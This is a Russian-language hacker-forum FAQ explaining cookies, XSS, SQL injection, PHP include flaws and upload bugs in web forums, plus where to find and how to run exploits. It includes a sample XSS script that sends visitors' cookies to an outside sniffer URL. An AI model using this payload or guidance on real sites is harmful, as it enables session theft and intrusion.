Итак,вот он долгожданный FAQ,в состовлении принимали участие qBIN и AzazelЕсли у вас есть какие-либо добавления вопросы, прошу отправлять в личку нам,возможно они появится в FAQ
Что такое cookie(куки\кукисы\"печенья" далее просто cookie)?
cookie - это переменная,хранящяяся на стороне клиента.
За более полной информацией можно обратится сюда
или сюда. Так же, будет полезно почитать литературу.
Чем(как) отредактировать сookie?
Ниже преведены ссылки на редакторы cookie для различных браузеров(Сокрашения :IE - Internet Explorer, FF - FireFox):
IE - http://www.proxoft.com/CookieEditor.asp
FF - https://addons.mozilla.org/firefox/573/
Opera - Встроенный редактор
Какие виды уязвимостей встречаются в форумах и что они из себя представляют?
Мы перечислим основные из них:
1)xss(активные и пассивные)
Уязвимости класса xss в сущности сводятся к тому, что пользователь может внедрить в страницу произвольный
html-код. Это может случиться если фильтрация вводимых символов организованна некорректно(или её вопще нет).
Часто подобные аттаки организуются через любые поля ввода.Эти уязвимости делятся на две подкатегории: активный xss и пассивный xss.
Ативный xss-исполнение html кода, без "активных" действий пользователя. На примере форума: плохой программист не позаботился о фильтрации html тегов,
тогда злой дядька пишет сообщение
"Привет, какой классный у вас форум <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>"
в результате просмотра этого сообщения пользователем его cookie "уплывут" на "сниффер".
Перейдём к пассивному XSS. Отличается от активного он тем, что для успешного проведения атаки пользователь должен пройти по специально составленной, предложенной ему ссылке, ведущей куда-либо на том же сайте откуда мы хотим увести куки. Обычно для такой атаки используются адресная строка браузера,поле search(работающее методом get),либо фрейм.
Больше информации о xss:
http://www.antichat.ru/crackchat/HTML/
http://ha.ckers.org/xss.html
http://google.ru
Решение:
http://debug-mode.in/tmp.txt
2)sql-inj
Уязвимость присутствует лишь в веб-приложениях работающих с бд.Если работа скрипта(фильтрация) организованна некорректно, мы можем модернизировать этот запрос таким образом, что он прихватит с собой из базы не только содержимое топика из таблицы topics, но и например значение поля password из таблицы users.
Не вижу смысла подробнее описывать sql-инъекции, т.к. это довольно обьёмная тема по которой существует очень много статей.
Cтатьи:
http://forum.antichat.ru/thread12132.html
http://zaco.jino-net.ru/index.php?f...& … news_id=15
http://www.infocity.kiev.ua/db/content/db263.phtml
http://www.abc-it.lv/index.php/id/715
3)php-inj
Один из самых опасных видов уязвимостей, позволяющий выполнять системные комманды на сервере.Успех проведения аттаки зависит от конфигурации сервера, ну и конечно от наличия самой уязвимости.Уязвимость заключается в некоректной проверки или её отсутствия переменных. предположим что переменная page используется в функции include , тогда возможно подключить удаленный скрипт и выполнить его.
4)Различные ошибки
Сюда я бы включил ошибки программистов.Например если веб-программист не реализовал проверку на расширение закачиваемых аватарок(Мы имеем в виду форумы,из-за спецификации раздела) тогда возможно загрузить скрипт,выполняющий комманды.
Что такое exploit(sploit,сплойт,експлоит,эксплоит) ?
exploit - программа, эксплотирующая уязвимость.
Где найти exploit под определенный продукт?
http://seclab.ru
http://milw0rm.com
http://google.ru
Как использовать(запустить)exploit?
https://forum.antichat.ru/thread26510.html
Обычно эксплойты пишут на perl,php реже C и C++
Все зависит от языка:
Perl. Об использовании perl нам говорит как правило первая строчка в эксплойте #!/usr/bin/perl
Для использования эксплойтов на Perl нам необходим интерпретатор языка.Если у вас unix-like система,то скорее всего perl присутствует в дистрьюбитиве.Под Windows интерпретатор скачать можно тут http://www.activestate.com/Products/ActivePerl/?mp=1
php. "<?php" или "<?" говорит нам о том, что эксплойт написан на Php. Для эксплуатации так же необходим интерпретатор. Достать его можно на офицальном сайте http://php.net/ , но самое простое - установить Дэнвер http://www.denwer.ru/
C \ C++ Тут потребуется компилятор,какой использовать для компиляции можно уточнить у создателя сплойта,чаще указывают в коментариях на чем компилировать.
И все же как использовать exploit?Все зависит от самой уязвимости,часто создатели сплойта пишут параметры принимаемые эксплойтом.Если их нет,обратитесь к создателю.
Почему не работает этот эксплоит?
Часто создатели exploit'ов намеренно добавляют в них ошибки, для того что бы ими не пользовались незнающие люди.Так же возможно что "цель" пропатчена.